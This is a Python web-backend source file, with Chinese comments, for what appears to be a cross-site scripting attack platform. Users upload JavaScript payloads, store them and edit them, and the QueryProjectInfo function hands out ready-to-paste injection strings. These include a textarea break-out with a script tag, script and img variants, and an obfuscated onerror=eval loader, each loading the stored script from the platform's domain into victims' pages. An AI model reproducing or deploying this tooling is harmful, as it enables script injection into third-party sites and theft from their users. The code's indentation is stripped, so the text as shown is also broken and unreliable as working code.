def GenerateProject(request):#用来生成项目,并且生成文件和用户绑定
RequestLogRecord(request, request_api="create_cross_site_script_project")
if request.method == "POST":
try:
JavaScriptFileData = json.loads(request.body)["javascript_data"]#获取前端传入的加密过的js文件数据
ProjectName = json.loads(request.body)["project_name"]#项目名
UserToken = json.loads(request.body)["token"]
Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名
if Uid != None and JavaScriptFileData!=None: # 查到了UID,并且js数据不为空
UserOperationLogRecord(request, request_api="create_cross_site_script_project", uid=Uid)
GetJavaScriptFilePath().Result()#获取js文件路径
while True:#如果查询确实冲突了
JavaScriptSaveFileName=randoms().result(5)#文件名
QueryJavaScriptSaveFileNameValidity = CrossSiteScriptProject().RepeatInvestigation(file_name=JavaScriptSaveFileName)#判断文件是否重复
if not QueryJavaScriptSaveFileNameValidity:#如果不冲突的话跳出循环
break
JavaScriptSaveRoute = GetJavaScriptFilePath().Result() + JavaScriptSaveFileName # 获得保存路径
with open(JavaScriptSaveRoute, 'wb') as f:
f.write(base64.b64decode(str(JavaScriptFileData).encode('utf-8')))#文件内容还要加密
CrossSiteScriptProject().Write(file_name=JavaScriptSaveFileName,uid=Uid,project_name=ProjectName)#写到数据库表中
return JsonResponse({'message': "欧拉欧拉欧拉欧拉欧拉欧拉欧拉欧拉(๑•̀ㅂ•́)و✧", 'code': 200, })
else:
return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })
except Exception as e:
ErrorLog().Write("Web_CrossSiteScriptHub_CrossSiteScript_GenerateProject(def)", e)
return JsonResponse({'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, })
else:
return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def QueryProjectInfo(request): # 查询项目中详细信息
RequestLogRecord(request, request_api="query_cross_site_script_project_info")
if request.method == "POST":
try:
ProjectAssociatedFileName = json.loads(request.body)["project_associated_file_name"]#传入项目生成的文件名
UserToken = json.loads(request.body)["token"]
Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名
if Uid != None: # 查到了UID
UserOperationLogRecord(request, request_api="query_cross_site_script_project_info", uid=Uid)
AuthorityCheck = CrossSiteScriptProject().AuthorityCheck(uid=Uid,file_name=ProjectAssociatedFileName) # 用来校检CrossSiteScript数据库中文件名和UID相对应
if AuthorityCheck:#判断文件是属于该用户,如果属于的话就对文件进行修改
JavaScriptFilePath=GetJavaScriptFilePath().Result() + ProjectAssociatedFileName#获取文件位置
ReadFileData=open(JavaScriptFilePath, 'r',encoding='UTF-8').read()#读取文件内容
return JsonResponse({'message': {"project_associated_file_data":base64.b64encode(str(ReadFileData).encode('utf-8')).decode('utf-8'),
"the_first_use":"""</tExtArEa>'"><sCRiPt sRC=//"""+cross_site_script_uses_domain_names+"/s/"+ProjectAssociatedFileName+"></sCrIpT>",
"the_second_use":"<sCRiPt/SrC=//"+cross_site_script_uses_domain_names+"/s/"+ProjectAssociatedFileName+">",
"the_third_use":"<img sRC=//"+cross_site_script_uses_domain_names+"/s/"+ProjectAssociatedFileName+">",
"exploit_path":"//"+cross_site_script_uses_domain_names+"/s/"+ProjectAssociatedFileName,
"coding_exploit":"""</tEXtArEa>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22%2F%2F"""+cross_site_script_uses_domain_names+"%2Fs%2F"+ProjectAssociatedFileName+"%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>"}, 'code': 200, })
else:
return JsonResponse({'message': "你没有查询这个项目的权限哦宝贝~", 'code': 404, })
else:
return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })
except Exception as e:
ErrorLog().Write("Web_CrossSiteScriptHub_CrossSiteScript_QueryProjectInfo(def)", e)
return JsonResponse({'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, })
else:
return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def ModifyProject(request): # 用来修改XSS项目中的数据
RequestLogRecord(request, request_api="modify_cross_site_script_project")
if request.method == "POST":
try:
ProjectAssociatedFileName = json.loads(request.body)["project_associated_file_name"]#传入项目生成的文件名
ProjectAssociatedFileData = json.loads(request.body)["project_associated_file_data"]#传入base64加密后的数据
UserToken = json.loads(request.body)["token"]
Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名
if Uid != None: # 查到了UID
UserOperationLogRecord(request, request_api="modify_cross_site_script_project", uid=Uid)
AuthorityCheck = CrossSiteScriptProject().AuthorityCheck(uid=Uid,file_name=ProjectAssociatedFileName) # 用来校检CrossSiteScript数据库中文件名和UID相对应
if AuthorityCheck:#判断文件是属于该用户,如果属于的话就对文件进行修改
JavaScriptFilePath=GetJavaScriptFilePath().Result() + ProjectAssociatedFileName#获取文件位置
with open(JavaScriptFilePath, 'w+',encoding='UTF-8') as f:
f.write(base64.b64decode(str(ProjectAssociatedFileData).encode('utf-8')).decode('utf-8')) # 文件内容还要解密
return JsonResponse({'message': "文件内容覆盖成功~", 'code': 200, })
else:
return JsonResponse({'message': "你没有查询这个项目的权限哦宝贝~", 'code': 404, })
else:
return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, })
except Exception as e:
ErrorLog().Write("Web_CrossSiteScriptHub_CrossSiteScript_ModifyProject(def)", e)
return JsonResponse({'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, })
else:
return JsonResponse({'message': '请使用Post请求', 'code': 500, })